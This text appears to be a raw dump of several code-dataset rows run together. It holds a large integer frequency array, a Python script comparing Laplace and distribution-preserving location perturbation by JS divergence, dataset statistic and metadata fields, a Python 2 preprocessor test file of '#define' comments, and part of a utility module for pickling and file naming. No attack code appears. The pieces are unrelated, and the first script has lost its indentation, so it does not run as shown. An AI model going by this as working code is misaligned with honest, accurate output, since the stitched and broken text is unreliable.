0, 4, 12, 0, 0, 0, 0, 184, 1494, 646, 142, 107, 0, 0, 164, 0, 80, 776, 0, 117, 0, 195, 312, 1216, 0, 0, 6, 12238, 1491, 201, 0, 40, 14, 91, 295, 52, 601, 1349, 107, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 27, 102, 0, 0, 0, 0, 0, 0, 63, 0, 0, 0, 0, 25, 8, 11, 0, 0, 0, 0, 0, 157, 0, 40, 5, 47, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 282, 281, 0, 5, 3, 0, 0, 0, 0, 0, 0, 56, 50, 7, 1, 0, 82, 0, 62, 772, 0, 179, 7, 19, 913, 70, 73, 0, 0, 32, 14, 98, 68, 22, 0, 62, 303, 248, 255, 798, 1114, 56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 138, 0, 0, 0, 0, 2, 6, 87, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0, 125, 33, 0, 0, 0, 0, 28, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 124, 329, 252, 589, 126, 7, 0, 0, 0, 0, 0, 0, 0, 95, 9, 0, 5, 0, 60, 0, 51, 608, 0, 166, 0, 14, 36, 4, 65, 0, 0, 0, 0, 0, 0, 0, 0, 106, 338, 390, 260, 784, 128, 961, 181, 0, 0, 0, 0, 0, 0, 1, 4, 59, 34, 0, 0, 0, 1, 5, 0, 41, 6, 0, 0, 0, 4, 19, 0, 0, 0, 0, 0, 154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 72, 150, 242, 212, 3, 0, 84, 9, 0, 0, 0, 0, 0, 0, 0, 102, 0, 0, 1, 0, 43, 0, 52, 598, 0, 422, 22, 111, 37, 7, 51, 9, 13, 5, 0, 0, 0, 2, 252, 197, 0, 0, 1164, 733, 0, 2, 787, 153, 8, 0, 1, 0, 28, 4, 0, 58, 32, 0, 0, 0, 5, 0, 0, 0, 52, 0, 0, 0, 0, 22, 0, 0, 0, 0, 0, 148, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 585, 168, 171, 0, 0, 0, 0, 67, 0, 0, 0, 0, 0, 0, 0, 96, 0, 0, 44, 45, 125, 0, 60, 299, 307, 255, 0, 8, 0, 0, 19, 0, 0, 10, 14, 56, 218, 226, 7, 0, 0, 0, 39, 10, 0, 0, 18, 569, 558, 111, 2, 0, 79, 103, 89, 96, 47, 0, 0, 0, 6, 0, 0, 0, 107, 26, 25, 28, 0, 24, 0, 0, 0, 0, 88, 79, 89, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 53, 68, 41, 194, 0, 0, 0, 0, 0, 9, 55, 0, 0, 0, 0, 0, 0, 260, 72, 41, 36, 0, 0, 0, 105, 0, 484, 236, 0, 6, 0, 0, 23, 0, 0, 131, 159, 157, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 854, 457, 16, 112, 116, 98, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 78, 0, 0, 26, 0, 23, 0, 0, 0, 0, 147, 98, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 57, 50, 0, 0, 0, 0, 0, 0, 0, 0, 8, 5, 59, 1, 0, 0, 1, 0, 152, 0, 0, 0, 0, 0, 0, 131, 0, 462, 156, 0, 11, 0, 0, 27, 56, 163, 23, 0, 0, 36, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 513, 0, 0, 0, 195, 70, 30, 0, 0, 0, 0, 10, 8, 0, 0, 12, 64, 0, 0, 27, 0, 20, 0, 0, 0, 0, 153, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 34, 38, 32, 40, 47, 30, 0, 19, 64, 35, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 3, 51, 1, 0, 11, 954, 679, 0, 0, 0, 0, 0, 0, 105, 177, 616, 343, 183, 180, 163, 164, 217, 130, 0, 0, 0, 0, 0, 56, 8, 0, 0, 0, 0, 0, 0, 0, 0, 28, 561, 0, 0, 0, 4, 0, 31, 81, 0, 0, 7, 5, 0, 0, 0, 56, 0, 0, 0, 29, 0, 22, 0, 0, 0, 0, 268, 969, 45, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 29, 0, 0, 0, 0, 0, 42, 53, 63, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 18, 17, 23, 21, 22, 351, 168, 69, 57, 54, 58, 53, 54, 107, 93, 402, 185, 0, 4, 0, 0, 44, 0, 0, 0, 0, 0, 0, 0, 44, 0, 0, 0, 0, 0, 0, 0, 748, 475, 134, 676, 0, 0, 3, 0, 0, 71, 27, 5, 3, 0, 0, 0, 7, 35, 0, 0, 0, 38, 0, 21, 0, 0, 0, 0, 527, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 30, 51, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 29, 0, 0, 0, 0, 0, 48, 0, 0, 0, 0, 0, 0, 76, 10, 414, 239, 46, 34, 0, 0, 30, 0, 0, 0, 0, 0, 0, 0, 73, 0, 0, 0, 0, 0, 0, 0, 29, 68, 76, 598, 0, 0, 4, 0, 0, 0, 24, 248, 10, 6, 0, 0, 72, 114, 0, 0, 0, 18, 78, 56, 38, 44, 40, 33, 462, 70, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 26, 74, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 22, 1, 0, 0, 0, 0, 0, 65, 0, 0, 69, 92, 0, 0, 80, 0, 391, 128, 0, 31, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 51, 0, 0, 0, 0, 0, 13, 7, 50, 159, 2, 269, 247, 4, 0, 0, 6, 19, 8, 87, 37, 4, 138, 109, 71, 115, 27, 55, 29, 0, 61, 24, 0, 0, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 37, 0, 0, 53, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 22, 0, 0, 0, 0, 0, 0, 42, 0, 0, 0, 23, 0, 0, 96, 1, 416, 168, 0, 25, 0, 0, 28, 0, 0, 0, 0, 0, 0, 0, 18, 0, 0, 10, 17, 12, 81, 39, 762, 36, 0, 0, 527, 4, 0, 18, 105, 0, 102, 66, 50, 84, 75, 0, 0, 0, 0, 0, 6, 19, 122, 60, 0, 1, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 0, 61, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 22, 1, 0, 0, 0, 0, 1, 96, 67, 0, 0, 0, 0, 0, 2, 46, 0, 436, 122, 0, 26, 0, 0, 30, 0, 0, 0, 5, 19, 20, 19, 48, 7, 13, 8, 0, 76, 8, 0, 0, 0, 0, 0, 194, 277, 0, 0, 0, 0, 55, 3988, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 57, 0, 0, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 40, 53, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 18, 0, 0, 0, 0, 0, 0, 0, 104, 0, 0, 0, 0, 0, 48, 3, 0, 457, 177, 0, 35, 0, 0, 34, 0, 0, 0, 26, 0, 0, 0, 14, 6, 20, 0, 0, 72, 0, 0, 0, 0, 0, 0, 220, 135, 199, 7, 0, 0, 43, 59, 0, 25, 19, 26, 33, 46, 3, 0, 1, 0, 0, 29, 22, 1, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 82, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 28, 0, 0, 0, 0, 0, 0, 0, 0, 41, 0, 0, 0, 0, 0, 38, 0, 0, 625, 112, 0, 28, 0, 0, 49, 51, 50, 49, 56, 27, 26, 28, 57, 20, 5, 31, 29, 0, 0, 0, 0, 0, 0, 0, 168, 59, 3, 353, 44, 1, 47, 12, 2, 191, 89, 51, 51, 154, 6, 31, 1, 0, 60, 19, 0, 18, 3, 0, 19, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 29, 52, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 30, 0, 108, 862, 88, 45, 217, 32, 16, 28, 17, 0, 0, 0, 0, 0, 0, 24, 0, 0, 1, 6, 33, 4, 1, 1, 2, 1, 2, 3, 206, 0, 164, 234, 356, 262, 209, 191, 410, 1209, 306, 278, 61, 30, 0, 15, 12, 70, 0, 0, 0, 20, 4, 20, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 23, 32, 4, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 20, 0, 0, 0, 0, 0, 28, 0, 1097, 982, 0, 0, 5, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 9, 2, 1, 1, 0, 0, 21, 60, 5, 0, 0, 0, 89, 151, 0, 0, 45, 32, 0, 0, 0, 316, 2044, 188, 78, 46, 0, 5, 5, 5, 74, 75, 5, 2, 1, 21, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 46, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 38, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 0, 0, 0, 0, 0, 0, 1613, 279, 529, 1260, 2, 1, 20, 1, 1, 1, 1, 2, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 17, 24, 12, 5, 239, 65, 22, 55, 50, 26, 306, 271, 197, 240, 72, 7, 6, 5, 5, 0, 0, 0, 35, 59, 0, 25, 5, 3, 47, 6, 0, 0, 0, 0, 0, 0, 0, 43, 32, 0, 0, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 31, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 30, 0, 1, 1, 2, 1, 1, 38, 1, 444, 535, 0, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 17, 365, 209, 86, 0, 106, 6, 11, 157, 91, 38, 0, 0, 0, 0, 0, 0, 0, 0, 0, 46, 57, 41, 37, 110, 46, 38, 17, 0, 0, 0, 0, 0, 26, 43, 5, 0, 0, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 25, 5, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 19, 14, 1, 0, 0, 0, 0, 0, 30, 0, 444, 351, 4, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 10, 0, 0, 0, 0, 0, 0, 0, 16, 13, 97, 500, 389, 794, 788, 2300, 187, 62, 35, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 21, 0, 0, 0, 58, 2, 3, 26, 0, 0, 0, 44, 23, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 22, 13, 1, 1, 1, 0, 2, 0, 0, 0, 0, 0, 6, 26, 0, 0, 0, 0, 0, 0, 0, 27, 0, 396, 447, 581, 2, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 39, 0, 0, 0, 0, 14, 465, 696, 89, 80, 95, 34, 7, 4, 2, 0, 0, 0, 0, 0, 5, 0, 0, 6, 23, 48, 0, 0, 21, 7, 0, 46, 10, 0, 0, 0, 0, 0, 0, 0, 27, 1, 1, 1, 1, 1, 1, 1, 1, 1, 4, 16, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 0, 0, 0, 0, 0, 0, 0, 0, 27, 0, 153, 140, 205, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 27, 2, 0, 0, 0, 0, 0, 0, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 31, 27, 24, 25, 26, 48, 27, 21, 26, 35, 51, 47, 0, 0, 0, 18, 0, 11, 0, 0, 1, 1, 1, 1, 1, 1, 41, 0, 0, 0, 0, 0, 0, 0, 0, 6, 19, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 29, 5, 0, 0, 0, 0, 0, 0, 0, 331, 106, 76, 217, 0, 448, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 42, 0, 2, 4, 4, 5, 15, 61, 6, 1, 7, 0, 0, 0, 0, 0, 5, 37, 1, 1, 0, 0, 0, 0, 0, 0, 0, 6, 36, 0, 0, 0, 0, 0, 0, 17, 23, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 17, 0, 0, 0, 0, 0, 0, 0, 0, 135, 28, 1, 263, 0, 75, 564, 694, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 28, 3, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 22, 0, 0, 0, 0, 0, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 41, 0, 0, 0, 0, 2, 26, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, 47, 28, 3, 1088, 56, 44, 71, 263, 99, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 0, 12, 10, 0, 0, 0, 0, 0, 0, 1, 28, 21, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 34, 32, 27, 28, 60, 36, 26, 32, 56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 3, 15, 0, 0, 148, 92, 201, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, 0, 0, 0, 0, 0, 0, 0, 0, 17, 10, 0, 0, 0, 0, 27, 26, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 22, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 29, 3, 0, 0, 0, 40, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 73, 104, 22, 6, 456, 530, 14, 29, 7, 8, 7, 6, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 0, 6, 29, 28, 2, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 9, 9, 8, 66, 7, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 22, 7, 0, 0, 0, 0, 20, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 0, 0, 0, 0, 0, 118, 178, 0, 0, 0, 0, 29, 0, 21, 0, 0, 297, 0, 0, 0, 0, 0, 0, 8, 28, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 57, 22, 0, 0, 4, 6, 6, 6, 5, 6, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 13, 0, 0, 0, 0, 0, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, 66, 0, 0, 0, 0, 0, 0, 87, 0, 0, 0, 0, 29, 0, 12, 0, 0, 123, 135, 0, 0, 0, 0, 0, 0, 1, 7, 10, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 2, 4, 4, 0, 68, 7, 6, 7, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 16, 0, 0, 0, 0, 0, 0, 0, 56, 0, 0, 0, 0, 0, 0, 0, 0, 5, 39, 0, 0, 0, 0, 0, 0, 14, 105, 0, 0, 0, 30, 0, 7, 8, 0, 0, 237, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 58, 9, 31, 6, 5, 5, 5, 0, 5, 7, 6, 5, 14, 40, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 16, 0, 0, 0, 0, 0, 0, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 35, 0, 0, 0, 0, 0, 0, 0, 50, 23, 56, 46, 0, 30, 0, 0, 39, 2, 0, 241, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 0, 74, 0, 0, 0, 1, 8, 4, 0, 0, 0, 0, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 51, 0, 0, 0, 0, 0, 0, 0, 0, 28, 0, 0, 0, 0, 0, 0, 35, 11, 0, 19, 15, 0, 30, 0, 0, 0, 0, 0, 238, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 155, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 23, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 48, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 28, 46, 0, 0, 0, 0, 0, 8, 33, 0, 0, 0, 0, 231, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 113, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 55, 23, 29, 26, 28, 25, 27, 43, 33, 57, 0, 10, 36, 36, 33, 8, 0, 0, 0, 0, 0, 0, 0, 11, 28, 0, 0, 32, 204, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 283, 67, 4, 0, 0, 0, 0, 0, 0, 0, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 34, 40, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 10, 30, 0, 83, 153, 6, 4, 4, 4, 4, 4, 4, 4, 3, 4, 1, 0, 269, 4, 2, 0, 0, 0, 0, 0, 0, 0, 0, 39, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 7, 31, 120, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 4, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 38, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 407, 0, 0, 0, 0, 3, 4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 13, 0, 0, 0, 0, 0, 0, 0, 0, 62, 204, 4, 0, 0, 0, 674, 119, 0, 0, 0, 0, 0, 0, 4, 3, 2, 6, 2, 0, 0, 0, 0, 3, 8, 2, 27, 0, 0, 0, 0, 0, 0, 88, 126, 4, 4, 1, 46, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0, 0]
perturbedFrequency_Laplace = [0 for i in range(dimension*dimension)]
perturbedFrequency_distPreserving = [0 for i in range(dimension*dimension)]
for i in range(len(frequency_1)):
oneDimensionLocation = i + 1
if oneDimensionLocation % 1 == 0:
print('进度: ' + str(oneDimensionLocation) + '/' + str(dimension * dimension))
if frequency_1[i] == 0:
continue
Epsilon_list = []
for epsilon_count in range(frequency_1[i]):
Epsilon = random.uniform(0.1, 1)
Epsilon_list.append(Epsilon)
reportedLocation_Laplace = perturbation_tool.perturbationOnOneLocation_userProportion(oneDimensionLocation,
frequency_1[i],
dimension,
Epsilon_list,proportion)
reportedLocation_distPreserving = perturbation_tool.perturbationOnOneLocation_patternPreserving_userProportion(
oneDimensionLocation,
frequency_1[i], dimension,
frequency_1, Epsilon_list,proportion)
for i in reportedLocation_Laplace:
perturbedFrequency_Laplace[i - 1] += 1
for i in reportedLocation_distPreserving:
perturbedFrequency_distPreserving[i - 1] += 1
perturbedFrequency_Laplace_numpy = np.array(perturbedFrequency_Laplace)
perturbedFrequency_distPreserving_numpy = np.array(perturbedFrequency_distPreserving)
sum_orgin = 0
sum_perturbed_Laplace = 0
sum_perturbed_distPreserving = 0
for i in range(len(frequency_1)):
sum_orgin += frequency_1[i]
sum_perturbed_Laplace += perturbedFrequency_Laplace[i]
sum_perturbed_distPreserving += perturbedFrequency_distPreserving[i]
if sum_orgin != sum_perturbed_Laplace:
print('Error 1')
elif sum_orgin != sum_perturbed_distPreserving:
print('Error 2')
formalized_orgin = []
formalized_perturbed_Laplace = []
formalized_perturbed_distPreserving = []
for i in range(len(frequency_1)):
formalized_orgin.append(frequency_1[i]/sum_orgin)
formalized_perturbed_Laplace.append(perturbedFrequency_Laplace[i]/sum_perturbed_Laplace)
formalized_perturbed_distPreserving.append(perturbedFrequency_distPreserving[i] / sum_perturbed_distPreserving)
frequency_orgin = np.array(formalized_orgin)
frequency_perturbed_Laplace = np.array(formalized_perturbed_Laplace)
frequency_perturbed_distPreserving = np.array(formalized_perturbed_distPreserving)
JS_Laplace.append(perturbation_tool.JS_divergence(formalized_orgin,formalized_perturbed_Laplace))
JS_distPreserving.append(perturbation_tool.JS_divergence(formalized_orgin,formalized_perturbed_distPreserving))
print("JS divergence")
JS_multiTimes_Laplace.append(JS_Laplace)
JS_multiTimes_distPreserving.append(JS_distPreserving)
mean_list = []
std_list = []
for k in range(len(proportion_list)):
column_list = []
for i in range(len(JS_multiTimes_Laplace)):
column_list.append(JS_multiTimes_Laplace[i][k])
column_numpyList = np.array(column_list)
column_mean = np.mean(column_numpyList)
column_std = np.std(column_numpyList,ddof=1)
mean_list.append(column_mean)
std_list.append(column_std)
print('Laplace下JS距离的均值,标准差:')
print(mean_list)
print(std_list)
mean_list = []
std_list = []
for k in range(len(proportion_list)):
column_list = []
for i in range(len(JS_multiTimes_distPreserving)):
column_list.append(JS_multiTimes_distPreserving[i][k])
column_numpyList = np.array(column_list)
column_mean = np.mean(column_numpyList)
column_std = np.std(column_numpyList,ddof=1)
mean_list.append(column_mean)
std_list.append(column_std)
print('distPreserving下JS距离的均值,标准差:')
print(mean_list)
print(std_list)
if __name__ =='__main__':
main ()
| 398.438095
| 36,535
| 0.472034
| 10,518
| 41,836
| 1.862141
| 0.135197
| 0.453691
| 0.557541
| 0.616563
| 0.384254
| 0.345757
| 0.310119
| 0.279639
| 0.259522
| 0.240069
| 0
| 0.550129
| 0.27952
| 41,836
| 105
| 36,536
| 398.438095
| 0.099662
| 0
| 0
| 0.242718
| 0
| 0
| 0.002492
| 0.000647
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009709
| false
| 0
| 0.067961
| 0
| 0.07767
| 0.116505
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e68def69dd31a669805627bd88111d7c2038fa74
| 514
|
py
|
Python
|
test/inputs/define_undef.py
|
zaxebo1/preprocess
|
7cce7848d50af5b8f068127dd67f482568d9648d
|
[
"MIT"
] | 21
|
2015-12-21T22:35:22.000Z
|
2022-02-18T03:07:55.000Z
|
test/inputs/define_undef.py
|
pombreda/preprocess
|
7cce7848d50af5b8f068127dd67f482568d9648d
|
[
"MIT"
] | 5
|
2015-09-11T15:03:03.000Z
|
2018-02-19T09:53:17.000Z
|
test/inputs/define_undef.py
|
pombreda/preprocess
|
7cce7848d50af5b8f068127dd67f482568d9648d
|
[
"MIT"
] | 10
|
2015-09-14T08:16:54.000Z
|
2022-02-18T03:08:09.000Z
|
#!python
# #define FOO_A
# #define FOO_B 0
# #define FOO_C 1
if __name__ == '__main__':
# #if FOO_A
print "a"
# #endif
# #if FOO_B
print "b"
# #endif
# #if defined("FOO_B")
print "b defined"
# #endif
# #if FOO_C
print "c"
# #endif
# #if defined("FOO_D")
print "d defined"
# #endif
# #undef FOO_B
# #undef FOO_D
# #if FOO_A
print "a"
# #endif
# #if defined("FOO_B")
print "b defined"
# #endif
# #if FOO_C
print "c"
# #endif
# #if defined("FOO_D")
print "d defined"
# #endif
| 12.85
| 26
| 0.577821
| 83
| 514
| 3.313253
| 0.192771
| 0.178182
| 0.203636
| 0.247273
| 0.723636
| 0.723636
| 0.723636
| 0.610909
| 0.610909
| 0.610909
| 0
| 0.005208
| 0.252918
| 514
| 39
| 27
| 13.179487
| 0.710938
| 0.492218
| 0
| 0.8
| 0
| 0
| 0.230047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.9
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
e6b401f62c6d57634b0c0c55e579a2c276b23a1b
| 151,935
|
py
|
Python
|
utils/xfg_util/rgx_utils.py
|
fioushen/ParallelismPrediction
|
8324c0d7d99b960db968fa3c2382c27548643c81
|
[
"MIT"
] | null | null | null |
utils/xfg_util/rgx_utils.py
|
fioushen/ParallelismPrediction
|
8324c0d7d99b960db968fa3c2382c27548643c81
|
[
"MIT"
] | null | null | null |
utils/xfg_util/rgx_utils.py
|
fioushen/ParallelismPrediction
|
8324c0d7d99b960db968fa3c2382c27548643c81
|
[
"MIT"
] | 1
|
2020-07-03T10:25:42.000Z
|
2020-07-03T10:25:42.000Z
|
import re
import sys
import pickle
import datetime
max_bytes = 2**31 - 1
def onehot(n, dim):
one_hot = [0] * dim
one_hot[n] = 1
return one_hot
def safe_pickle(data, file):
"""
Pickle big files safely, processing them in chunks
:param data: data to be pickled
:param file: file to pickle it into
"""
pickle_out = pickle.dumps(data)
n_bytes = sys.getsizeof(pickle_out)
with open(file, 'wb') as f:
count = 0
for i in range(0, n_bytes, max_bytes):
f.write(pickle_out[i:min(n_bytes, i + max_bytes)])
count += 1
def set_file_signature(param, data_folder, set_from_date_time=False):
"""
Set file signature to differentiate between embeddings trainings
:param param: parameters of the inst2vec training
:param data_folder: string containing the path to the parent directory of raw data sub-folders
:param set_from_date_time: set file signature according to time and date instead of parameters
:return: file signature
"""
if set_from_date_time:
file_signature = datetime.datetime.now().strftime("%Y-%m-%d--%H-%M")
else:
file_signature = '_' + re.sub(r'/', '_', data_folder) + \
'_d-' + str(param['embedding_size']) + \
'_m-' + str(param['mini_batch_size']) + \
'_s-' + str(param['num_sampled']) + \
'_e-' + str(param['learning_rate']) + \
'_r-' + str(param['beta']) + \
'_cw-' + str(param['context_width']) + \
'_N-' + str(param['num_epochs'])
